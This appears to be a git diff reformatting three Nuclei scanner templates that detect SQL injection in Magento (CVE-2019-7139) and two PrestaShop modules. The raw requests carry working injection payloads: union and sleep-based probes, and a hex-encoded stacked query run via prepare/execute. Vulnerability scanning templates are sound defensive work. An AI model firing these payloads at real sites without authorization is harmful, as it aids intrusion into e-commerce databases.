minor format changes
parent
8413c702c5
commit
ffaea01532
|
@ -1,53 +1,69 @@
|
|||
id: CVE-2019-7139
|
||||
|
||||
info:
|
||||
name: CVE-2019-7139
|
||||
name: Magento - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
severity: critical
|
||||
description: |
|
||||
The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied ‘from’ and ‘to’ inputs to the ‘prepareSqlCondition’ function of the ‘Magento\Framework\DB\Adapter\Pdo\Mysql’ class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information
|
||||
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
|
||||
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
|
||||
reference:
|
||||
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
|
||||
- https://www.ambionics.io/blog/magento-sqli
|
||||
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
|
||||
- https://github.com/koutto/jok3r-pocs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-7139
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00582
|
||||
epss-percentile: 0.778
|
||||
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 4
|
||||
vendor: magento
|
||||
product: magento
|
||||
framework: magento
|
||||
tags: sqli,magento
|
||||
shodan-query: http.component:"Magento"
|
||||
tags: cve,cve2019,sqli,magento
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
stop-at-first-match: true
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: or
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: Blind
|
||||
name: time-based
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'status_code_2 == 200'
|
||||
- 'status_code_3 == 400'
|
||||
- 'contains(content_type_2, "application/json")'
|
||||
- 'contains(content_type_3, "application/json")'
|
||||
- 'len(body_2) == 2'
|
||||
- 'len(body_3) == 2'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: Time
|
||||
name: blind-based
|
||||
dsl:
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'duration_4>=6'
|
||||
- 'contains(content_type_4, "application/json")'
|
||||
- 'len(body_4) == 2'
|
||||
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
|
||||
- 'status_code_3 == 200 && status_code_4 == 400'
|
||||
- 'len(body_3) == 2 && len(body_4) == 2'
|
||||
condition: and
|
|
@ -1,36 +1,46 @@
|
|||
id: CVE-2023-27032
|
||||
|
||||
info:
|
||||
name: CVE-2023-27032
|
||||
name: PrestaShop AdvancedPopupCreator - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
|
||||
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-27032
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00106
|
||||
epss-percentile: 0.42495
|
||||
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: idnovate
|
||||
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: sqli,prestashop,advancedpopupcreator
|
||||
verified: true
|
||||
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout 10s
|
||||
POST /module/advancedpopupcreator/popup HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=1709941392995&token=1946dc43bb8d7cb5fef89588e87479d8
|
||||
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=&token=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "popups"
|
||||
- duration>=6
|
||||
- status_code == 200
|
||||
- contains(content_type, "text/html")
|
||||
- contains_all(body, 'popups','hasError')
|
||||
condition: and
|
|
@ -1,32 +1,59 @@
|
|||
id: CVE-2023-45375
|
||||
info:
|
||||
name: CVE-2023-45375
|
||||
name: PrestaShop PireosPay - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2023-45375
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.0005
|
||||
epss-percentile: 0.17639
|
||||
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
vendor: 01generator
|
||||
product: pireospay
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: sqli,prestashop,pireospay
|
||||
tags: cve,cve2023,sqli,prestashop,pireospay
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code == 200
|
||||
- contains(body, "/modules/pireospay/")
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10
|
||||
POST /module/pireospay/validation HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
- duration>=6
|
||||
- status_code == 302
|
||||
- contains(content_type, "text/html")
|
||||
condition: and
|
Loading…
Reference in New Issue